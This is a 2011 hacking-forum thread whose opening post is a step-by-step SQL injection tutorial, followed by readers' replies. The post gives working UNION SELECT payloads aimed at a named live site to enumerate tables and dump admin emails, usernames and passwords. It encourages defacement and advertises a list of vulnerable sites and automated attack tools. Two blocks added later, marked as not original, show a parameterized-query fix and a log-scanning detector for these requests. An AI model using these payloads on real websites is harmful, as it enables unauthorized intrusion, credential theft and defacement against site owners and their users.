Post: SQL Injection - The Real Tutorial
05-08-2011, 09:46 AM #1
SQL Injection



Today I will be showing you guys how to get Database information of a website with the very known exploiting method: SQLi.

I am making this tutorial in the Computing and Hacking section and not in the premium section as the tutorial should be accessed by all members and not only for premiums as this tutorial is everywhere on the internet Smile


So lets get started :y:

What is SQL Injection?
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
Source: You must login or register to view this content.

SQL Injection is a very well known exploiting method. You can only SQL Inject a website if it's vulnerable to SQLi.


What can I gain from SQL Injecting a website?
You basically get ALL the database information of the website. The database includes information about ALL users (Password, Name, Email, Join date even Credit Card info etc.)
You can also gain Admin login. After you have that, you can finally deface the site Smile



▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - Finding a Target █ ▇ ▆ ▅ ▄ ▃ ▂



So now you know what SQL injection is, now we can finally get in action :evil:

First of all we need to find a target. The target HAS to be vulnerable to SQLi. To find out if a website is vulnerable to SQLi, simply add a ' at the end of the url.
So for me it would be: www.examplewebsite.com/index.php?id=1'
Now press enter, if you get an error that says something like: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar. That error is good, as it means that the site is vulnerable, hackable, so now you can simply continue with SQL Injecting Happy. If you get no error, the site is not vulnerable.

Here is a nice tutorial by my friend Curt on how to find a vulnerable website Smile Thanks to him :y:

You must login or register to view this content.


▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Method 1 █ ▇ ▆ ▅ ▄ ▃ ▂



So now here is the tutorial. Enjoy and follow all the steps to be successful Smile

So now you have your target and you know it is vulnerable to SQLi. Now all we have to do is inject our codes to get the database information Happy

So my target today will be:
    https://www.novebrno.net/article.php?id=616


I tested it and it is vulnerable.

Now we are going to add +ORDER+BY+1-- to the site. Now most people that know SQL will ask why not add order by 1--? Mainly because you can change the URL if you add the + to order by 1--, you will find it out yourself :p
So the site should look like this now:
    https://www.novebrno.net/article.php?id=-616+ORDER+BY+1--


Now you will be :wtf: I didn't get an error. Well now simply change the 1 at the end of the url to 2, now just keep going until you get an error.
I tested it and I got an error at column 12:

So now I got an error at column 12, so there are 11 columns that are available and column 12 doesn't exist.

So now lets keep going.

So now we know the 11 available columns, we gotta find the vulnerable column. Just add:
    +UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--
at the end of the url

NOTE: I have UNION SELECT 1,2,3,4,5,6,7,8,9,10,11-- because I have 11 available columns, yours might be different.

Now there should be a number on the screen, it can either only be one of the 11 available columns (in my case).
But in my case, there are no numbers showing. Why? Because some websites require you to null the value you are injecting into.

So all we do now is add a - before the number. It should look like this:
    https://www.novebrno.net/article.php?id=-616+union+select+1,2,3,4,5,6,7,8,9,10,11--


Now I am getting an error and the number is showing:

Number 5 is showing on my screen, so now we will keep going with this number.

So now we have to replace the number 5 with @@version
Add this at the end of the url: +UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--

NOTE: In my case number 5 is showing, if you have number 3 on the screen it should look like this +UNION+SELECT+1,2,@@version--

The URL should look like this:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--


So now you will see a number on the screen, it is the Database version. If the Database is 5 and above, you are fine and it will be easy to get the information and tables Smile

IF the database is 4 and lower, it will be hard to get tables, more to read later.

▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 5 and above █ ▇ ▆ ▅ ▄ ▃ ▂


Screenie of my database:


So now we know the database version, now we need to get the tables names.
To do so, add this at the end of the url: +UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables

NOTE: It should be different in your case, in my case it's 1,2,3,4,table_name,... etc.

The url should look like this now:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables


Now you should get the Tables information.

Sometimes, some of the table names will be cut off, because we are calling the tables from information_schema. So here, we would want to pull the data from the primary database, instead of information_schema.

If it's that case add this at the end of the url: +UNION+SELECT+1,2,3,4,group_contact(table_name),6,7,8,9,10,11 from information_schema.tables+where+table_schema=database()

Now this should work and you should get all the tables information Smile

Some Tables should be:
    About, Admin, Admins, User, Users, Affiliates, Access, Customer, User, Login, terms, posts, etc


Now we want to get the data from those tables. Well, we will change the data in the vulnerable column from table_name, to column_name

So we add this at the end of the url:
+UNION+SELECT+1,2,3,4,group_contact(column_name),6,7,8,9,10,11 from information_schema.columns+where+table_name=*Hexed table name*

So it should look like this:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,group_contact(column_name),6,7,8,9,10,11 from information_schema.columns+where+table_name=*Hexed table name*ed%20table%20name*


So now let's say we got an 'admin' table, now we will change the url to:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(column_name),3%20from%20information_schema.columns+where+table_name=admin


You can change the table_name=.. to any table you want to get information from.

Now you will be like wtf? It didn't work, well that is because we didn't hax the table name. So now to hax the table name go to: You must login or register to view this content. to convert the name admin into hax datas.

Now change the url to:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(column_name),3%20from%20information_schema.columns+where+table_name=0x61646d696e


Admin is 61646d696e in hex, so I changed that at the end of the url. NOTE: you have to add 0x before the numbers.

Now that will give us all the columns of the table admin. :y:

Now lets say we got the columns email,password and username, to get the information of them type in the following in the url bar: +UNION+SELECT+1,group_contact(email,0x3a,username,0x3a,password),3 from admin

So it should look like:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(email,0x3a,username,0x3a,password),3 from admin


So now you finally have the passwords, emails and user names Smile

Remember, if your tables are different you also have to change the data with that I provided you. Always think while hacking, don't just be script kiddie Awesome face


▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 4 and above █ ▇ ▆ ▅ ▄ ▃ ▂



Now as pointed before, if your database is 4 and lower, you have a lil problem and it will be harder to get the tables.

If your database is 4 or lower add the following at the end of the url: +UNION+SELECT+1,concat(table_name,CHAR(5Cool Man (aka Tustin),column_name,CHAR(5Cool Man (aka Tustin),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3--

NOTE: If you have 5 available columns you will have to change it etc...

Now if you get no error and you see the tables you are fine Smile If not you are fuked and you will probably have to guess the tables :(

Here are some known table names:
    tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins, 


Now just add the following at the end of the url: +UNION+SELECT+1,2,3 from TABLE NAME HERE

So now I will guess the table name admins on my test url:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from admin


Now just keep guessing until you find a table name that works Winky Winky

Now lets say the following table worked:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from users


Now we will have to guess the columns Winky Winky Yes this is a fuking pain in the ass I know :(

Common columns names are:
    first_name, last_name, email, username, password, pass, user_id, user_pass


Now we will test the table name, user_pass type in the following at the end of the url: +UNION+SELECT+1,user_pass,3 from users

So it should look like this:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,user_pass,3 from users


Now just keep guessing until one of the columns works. Happy

Now for example to get the user name, password and email type in the following at the end of the url: +UNION+SELECT+1,contact(email,0x3a,username,0x3a,password),3 from users

So this will give us the information of the admin Smile

So this was the tutorial Hope you enjoyed Smile


▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Method 2 █ ▇ ▆ ▅ ▄ ▃ ▂



So now since there are different ways to SQLi, I will post up 2 methods for you guys :rolleyes:

So this time I will be using a test site, as I don't have time to look for the right vulnerable site :p
My site will be called:
    www.sqlitestsite.com/index.php/id=234


So now we have a target, now we gotta find the available columns. To find them add: order by 1/* at the end of the url, so it should look like:
    www.sqlitestsite.com/index.php/id=234 order by 1/*

NOTE: You can also use -- instead of /*.

Now this of course didn't give us an error, so we have to keep trying, just go on with:
order by 2/*
NO ERROR
order by 3/*
NO ERROR
order by 4/*
ERROR

So now we got an error at columns 4, that means there are 3 available columns, as column 4 doesn't exist and gave us the error.

Now we need to find which column is the one that is vulnerable, to do that add: union all select 1,2,3/* at the end of the url. So it should look like this:
    www.sqlitestsite.com/index.php/id=234 union all select 1,2,3/*


Now if there are no numbers showing on the screen, add a - before the =. So it should look like:
    www.sqlitestsite.com/index.php/id=-234 union all select 1,2,3/*


Now there is number 2 showing on the screen, so I know, columns 2 is vulnerable and I will be using this one to find out the database information Happy

So now to find out the database version, we need to replace the vulnerable column with @@database. So add: union all select 1,@@database,3/* at the end of the url. It should look like this:
    www.sqlitestsite.com/index.php/id=234 union all select 1,@@database,3/*


Now there you should see the database version at the screen. It will either be something like 4.xxx and 5.xxx.

So now since there are different methods for the databases I will split now the tutorial.


▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 5 and above █ ▇ ▆ ▅ ▄ ▃ ▂



So now we know that the database is version 5 and above. Now we need to find the tables Gaspink:

We need to replace the vulnerable column with table_name and add information_tables at the end of the url.
To get the tables add the following at the end of the url: union all select 1,table_name,3 from information_schema.tables/*
So it should look like:

    www.sqlitestsite.com/index.php/id=234  union all select 1,table_name,3 from information_schema.tables/*


Now you will see a few tables on the screen, but that are not all of them, to find all tables we need to limit the end of the query. We will do that by adding 0,1.. and so on at the end of the url.

Just add the following at the end of the url: union all select 1,table_name,3 from information_schema.tables limit 0,1/*

Now we know table one, but that's not enough, we need to get the right table to find out all the user information and also admin login.

Now to get the 2nd table, we need to replace 0,1, with 1,1 so it should look like: union all select 1,table_name,3 from information_schema.tables limit 1,1/*

To get the 3rd table we need to replace 1,1 with 2,1, so now you will just have to keep going until you find a useful table that can get us the information Smile

In order good tables are:
    tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins, 


Now we know the tables, now we need to find out the columns.

To find out the columns we will replace the vulnerable columns with: column_name so just add the following at the end of the url: union all select 1,column_name,3 from information_schema.columns limit 0,1/*

    www.sqlitestsite.com/index.php/id=234 union all select 1,column_name,3 from information_schema.columns limit 0,1/*


So now just replace 0,1 with 1,1, then with 2,1 and so on until you find a useful column as the following:
    first_name, last_name, email, username, password, pass, user_id, user_pass


So now we found a good table, lets say we found table admin. To get more info of that table add the following at the end of the url: union all select 1,column_name,3 from information_schema.columns where table_name='admin'/*

    www.sqlitestsite.com/index.php/id=234 union all select 1,column_name,3 from information_schema.columns where table_name='admin'/


So now we will get more information about the table "admin"

So now we see all the columns in table admin. To get the info of the columns you will have to type in the following, let's say we got column id, password, username: union all select 1,concat(id,0x3a,password,0x3a,username) from users/*

The 0x3a is the hex for a ;.

Now we will get the information and we are finally done with hacking a database version 5 Smile


▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 4 and above █ ▇ ▆ ▅ ▄ ▃ ▂


As Pointed before, I will show you guys now how to get the database info if the version is 4 or below.

adding soon, gotta do P90x now =D Awesome face
▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - Conclusion + Goodies █ ▇ ▆ ▅ ▄ ▃ ▂


So guys this was my tutorial on how to SQL Inject websites Smile I hope you understood everything, but if not feel free to ask me via private message, post your question below or add me on msn: [email protected]

Guys it took me 4 hours to make this fuking thread, so I would appreciate it if you say Thank you Winky Winky


Now since I am a nice guy, I will provide you guys with some goodies Smile

List of over 1500 vulnerable sites (found by me):
DOWNLOAD LINK: You must login or register to view this content.


Too lazy to do the manual SQL Injection? Here is a tutorial on how to SQLi with Havij and SQLi Helper v2.7 (Must be premium): You must login or register to view this content.


Want to make a good defacement but you don't know html or php? Use this tool to do the work for you Smile (Must be premium):
You must login or register to view this content.
Last edited by xTrYiPiCz ; 06-12-2011 at 11:19 AM.

The following 9 users say thank you to xTrYiPiCz for this useful post:

ClutchLikeObama, Curt, Goleggett, HonuCinema, IKvPro, Legalize It, thenewbigmack, Wondoh
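
Added example, not part of the original post: the root cause every step of the tutorial depends on (request input concatenated into the SQL text, with database errors shown to the client) next to the hardened form. It uses an in-memory SQLite database as a stand-in for the site's MySQL backend; the table, rows and function names are constructed for illustration, and the only injected inputs are the post's own trailing-quote and `union all select 1,2,3` marker probes.

```python
import sqlite3


def make_db():
    """Constructed sample data: a three-column table like the one Method 2 assumes."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, slug TEXT, title TEXT);
        INSERT INTO articles VALUES (234, 'hello', 'Hello');
    """)
    return db


def get_article_vulnerable(db, raw_id):
    # BEFORE: the request parameter is pasted into the SQL text, so everything
    # after the number is parsed as SQL. Kept vulnerable on purpose.
    sql = "SELECT id, slug, title FROM articles WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def get_article_safe(db, raw_id):
    # AFTER, layer 1: strong typing. Only a short run of ASCII digits is an id,
    # which rejects the "-234 ..." and "234'" forms before any SQL is built.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a non-negative integer")
    # AFTER, layer 2: a bound parameter. The value travels separately from the
    # statement text and can never change the statement's structure.
    return db.execute(
        "SELECT id, slug, title FROM articles WHERE id = ?", (int(raw_id),)
    ).fetchall()


def get_article_by_slug(db, slug):
    # String-valued parameters get the same treatment: binding makes a quote
    # character ordinary data, so there is no syntax error to observe.
    return db.execute(
        "SELECT id, slug, title FROM articles WHERE slug = ?", (slug,)
    ).fetchall()


def handle_request(db, raw_id):
    """Hypothetical request handler returning (status, body)."""
    try:
        rows = get_article_safe(db, raw_id)
    except ValueError:
        return 400, "bad request"
    except sqlite3.Error:
        # Never echo the database error text: the tutorial's column counting
        # and its vulnerability test both read that text from the page.
        return 500, "internal error"
    return (200, rows) if rows else (404, "not found")


if __name__ == "__main__":
    db = make_db()
    probe = "-234 union all select 1,2,3"
    print("vulnerable:", get_article_vulnerable(db, probe))
    print("hardened:  ", handle_request(db, probe))
    print("quote:     ", handle_request(db, "234'"))
    print("slug quote:", get_article_by_slug(db, "hello'"))
```

On the database side, the account the web application connects with should also have no rights beyond the tables it serves, so that a missed concatenation elsewhere cannot read unrelated tables.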
06-22-2011, 01:28 AM #11
gorgorn
Guest
wow.. great tutorial..:y::y:

i have one question..

how to make sql injection if the link of a website, there is no have integer number?

i mean like this :
    https://www.examplewebsite.com/index.php?id=ADMIN


so, the is imposible to making SQL injection of these website..??YesYes

sorry for my bad english...:confused::confused:
06-22-2011, 01:32 AM #12
ᴬustin_Powers
Do I make you horny?
Originally posted by gorgorn View Post
wow.. great tutorial..:y::y:

i have one question..

how to make sql injection if the link of a website, there is no have integer number?

i mean like this :
    https://www.examplewebsite.com/index.php?id=ADMIN


so, the is imposible to making SQL injection of these website..??YesYes

sorry for my bad english...:confused::confused:


You need to find the integer number, if there isn't one, you have to use a different method of hacking the site.
06-22-2011, 01:43 AM #13
gorgorn
Guest
Originally posted by Powers View Post
You need to find the integer number, if there isn't one, you have to use a different method of hacking the site.


what is the different method?

can u tell me more about these..??
06-25-2011, 09:05 PM #14
Nice Post But I Already Know All This Stuff. :y:
06-26-2011, 05:45 PM #15
2RAW4THESTREET
The Best who ever lived
Great tutorial bro. Well done.
08-13-2011, 09:18 AM #16
porsch3
Guest
nice tutorial
08-20-2011, 07:44 PM #17
almyz125
Save Point
Thanks for the tut.
08-20-2011, 07:56 PM #18
Ameht!
Dark Knight
Originally posted by xTrYiPiCz View Post
you're the man Winky Winky
09-22-2011, 12:35 PM #19
I found an error on a site on line 231.

Do I really need to put www.sitename.com/...+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11.... all the way up to 231?!

There must be an easier way.

Thanks
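
Added example, not part of the thread: the request sequence walked through above (a trailing quote, `ORDER BY` counting, `UNION SELECT` number lists, `information_schema` lookups, hex-encoded names) is distinctive in web server access logs. This sketch flags clients whose query strings hit several of those patterns; the log lines, IP addresses, rule names and threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# One rule per step of the tutorial. Applied to the URL-decoded query string.
RULES = {
    "quote_probe": re.compile(r"=[^&=]*'\s*(?:&|$)"),          # id=234'
    "order_by_enum": re.compile(r"\border\s+by\s+(\d+)", re.I),  # ORDER BY n
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_lookup": re.compile(r"\binformation_schema\b", re.I),
    "version_probe": re.compile(r"@@\w+"),
    "hex_literal": re.compile(r"=\s*0x[0-9a-f]{4,}", re.I),     # table_name=0x...
}

# Combined/common log format: client, request line, status.
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})'
)

# Constructed sample log. 203.0.113.7 replays the tutorial's steps;
# 198.51.100.20 is ordinary traffic, including a search that trips one rule.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Jun/2011:01:28:01 +0000] "GET /index.php?id=234' HTTP/1.1" 500 312
203.0.113.7 - - [22/Jun/2011:01:28:09 +0000] "GET /index.php?id=234+ORDER+BY+1-- HTTP/1.1" 200 5120
203.0.113.7 - - [22/Jun/2011:01:28:15 +0000] "GET /index.php?id=234+ORDER+BY+4-- HTTP/1.1" 500 312
203.0.113.7 - - [22/Jun/2011:01:28:30 +0000] "GET /index.php?id=-234+UNION+SELECT+1,2,3-- HTTP/1.1" 200 5098
203.0.113.7 - - [22/Jun/2011:01:28:44 +0000] "GET /index.php?id=-234+UNION+SELECT+1,@@version,3-- HTTP/1.1" 200 5101
203.0.113.7 - - [22/Jun/2011:01:29:02 +0000] "GET /index.php?id=-234+UNION+SELECT+1,column_name,3+from+information_schema.columns+where+table_name=0x61646d696e HTTP/1.1" 200 5230
198.51.100.20 - - [22/Jun/2011:01:30:00 +0000] "GET /index.php?id=234 HTTP/1.1" 200 5120
198.51.100.20 - - [22/Jun/2011:01:30:05 +0000] "GET /search.php?q=order+by+date HTTP/1.1" 200 2210
198.51.100.20 - - [22/Jun/2011:01:30:11 +0000] "GET /search.php?q=student+union+select+committee HTTP/1.1" 200 2304
""".splitlines()


def scan(lines, min_rules=2):
    """Return {client_ip: summary} for clients matching >= min_rules distinct rules.

    Requiring several distinct rules keeps a single coincidental match
    (such as the 'student union select committee' search) out of the report.
    """
    hits = defaultdict(lambda: {"rules": set(), "order_by": [], "requests": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, _status = m.groups()
        # '+' and %XX must be decoded first, or "UNION+SELECT" never matches.
        query = unquote_plus(urlsplit(target).query)
        matched = [name for name, rx in RULES.items() if rx.search(query)]
        if not matched:
            continue
        rec = hits[ip]
        rec["requests"] += 1
        rec["rules"].update(matched)
        rec["order_by"] += [int(n) for n in RULES["order_by_enum"].findall(query)]

    report = {}
    for ip, rec in hits.items():
        if len(rec["rules"]) >= min_rules:
            report[ip] = {
                "rules": sorted(rec["rules"]),
                "requests": rec["requests"],
                # Highest column index tried while counting columns.
                "order_by_max": max(rec["order_by"], default=0),
            }
    return report


if __name__ == "__main__":
    for ip, summary in scan(SAMPLE_LOG).items():
        print(ip, summary)
```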

Copyright © 2024, NextGenUpdate.
All Rights Reserved.